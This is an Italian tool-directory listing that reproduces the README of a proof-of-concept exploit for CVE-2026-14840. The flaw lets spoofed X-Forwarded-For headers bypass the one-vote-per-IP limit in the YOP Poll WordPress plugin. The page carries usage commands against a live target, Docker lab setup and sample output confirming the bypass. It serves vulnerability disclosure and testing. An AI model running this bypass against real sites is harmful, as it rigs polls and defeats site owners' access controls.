Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-14840 — Exploit proof-of-concept per il bypass del limite di voti di un plugin WordPress tramite header X-Forwarded-For contraffatti; include un laboratorio Docker per validare CVE-2026-14840 su istanze WordPress autorizzate. | Kitploit
Strumenti/GitHubGitHub/nullwhisper/cve-2026-14840
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingLab e Pratica
GitHubnullwhisper/cve-2026-14840

CVE-2026-14840

Exploit proof-of-concept per il bypass del limite di voti di un plugin WordPress tramite header X-Forwarded-For contraffatti; include un laboratorio Docker per validare CVE-2026-14840 su istanze WordPress autorizzate.

Vedi Repository
128 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-14840 — Bypass del limite di voto di YOP Poll < 7.0.6

Autore: nullwhisper
Caso d'uso: solo ricerca di sicurezza autorizzata / validazione di vulnerabilità.

Cos'è questo?

Il plugin YOP Poll versioni < 7.0.6 impone un limite di un voto per IP. Il problema è che per ottenere l'IP del client controlla HTTP_CLIENT_IP e HTTP_X_FORWARDED_FOR prima di REMOTE_ADDR. Entrambi gli header sono controllati dall'attaccante, quindi un utente non autenticato può falsificare un nuovo IP a ogni richiesta e votare un numero illimitato di volte.

  • CVE: CVE-2026-14840
  • Prodotto: plugin WordPress YOP Poll
  • Versioni interessate: < 7.0.6
  • Versione corretta: 7.0.6
  • Tipo: bypass del controllo di accesso
  • CVSS: 5.3

Riferimenti

  • WPScan: https://wpscan.com/vulnerability/fc810ca2-3f27-414d-b94a-68842925b7c6/
  • Scheda CVE: https://www.cve.org/CVERecord?id=CVE-2026-14840
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14840
  • File

    root@kitploit:~
    .
    ├── cve_2026_14840_poc.py   # Main PoC
    ├── lab/
    │   ├── docker-compose.yml  # WordPress lab
    │   └── setup.php           # Creates a poll + public test page
    ├── requirements.txt
    └── README.md
    

    Installazione

    root@kitploit:~
    pip3 install -r requirements.txt
    

    Utilizzo

    Target live

    root@kitploit:~
    python3 cve_2026_14840_poc.py -u https://target.com/page-with-poll -n 10
    

    -n è il numero di voti da esprimere. Se viene accettato più di un voto, il target è vulnerabile.

    Lo script ripiega automaticamente su ?rest_route=/yop-poll/v1/votes quando il sito utilizza i permalink semplici di WordPress e /wp-json/... restituisce HTML.

    Lab locale

    1. Scarica il plugin vulnerabile (non ridistribuire il binario del plugin):

      root@kitploit:~
      mkdir -p lab/yop-poll
      cd lab/yop-poll
      wget https://downloads.wordpress.org/plugin/yop-poll.7.0.5.zip
      unzip yop-poll.7.0.5.zip && rm yop-poll.7.0.5.zip
      cd ../..
      
    2. Avvia il lab:

      root@kitploit:~
      cd lab
      docker compose up -d
      
    3. Completa l'installazione di WordPress su http://127.0.0.1:8090.

    4. Crea il sondaggio e la pagina di test:

      root@kitploit:~
      docker exec -i lab-wpcli-1 php /tmp/setup.php
      
    5. Esegui il PoC:

      root@kitploit:~
      python3 cve_2026_14840_poc.py -u 'http://127.0.0.1:8090/?page_id=4' -n 5
      

    Verificato su localhost

    Testato su WordPress 6.8 + YOP Poll 7.0.5 con permalink semplici predefiniti.

    Stesso IP tre volte — il limite funziona:

    root@kitploit:~
    #1 201 -> Vote recorded successfully.
    #2 403 -> You have already voted on this poll.
    #3 403 -> You have already voted on this poll.
    

    IP diverso a ogni richiesta tramite X-Forwarded-For — il bypass funziona:

    root@kitploit:~
    #1 201 -> Vote recorded successfully.
    #2 201 -> Vote recorded successfully.
    #3 201 -> Vote recorded successfully.
    

    La tabella wp_yoppoll_votes cresce di una riga per ogni IP falsificato, confermando che il limite per-IP viene bypassato.

    Perché il plugin non è incluso

    Questo repository contiene solo il PoC e i file di orchestrazione del lab. Il plugin YOP Poll è GPL-2.0+, ma distribuire una copia completa non è necessario, appesantisce il repository e può causare problemi. Scarica la versione 7.0.5 da WordPress.org per il tuo lab.

    Esclusione di responsabilità

    Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e ricerca. Non usarlo contro sistemi di cui non sei proprietario o per i quali non hai esplicita autorizzazione a eseguire test. L'autore non è responsabile per usi impropri o danni causati da questo codice.

    Scarica lo strumento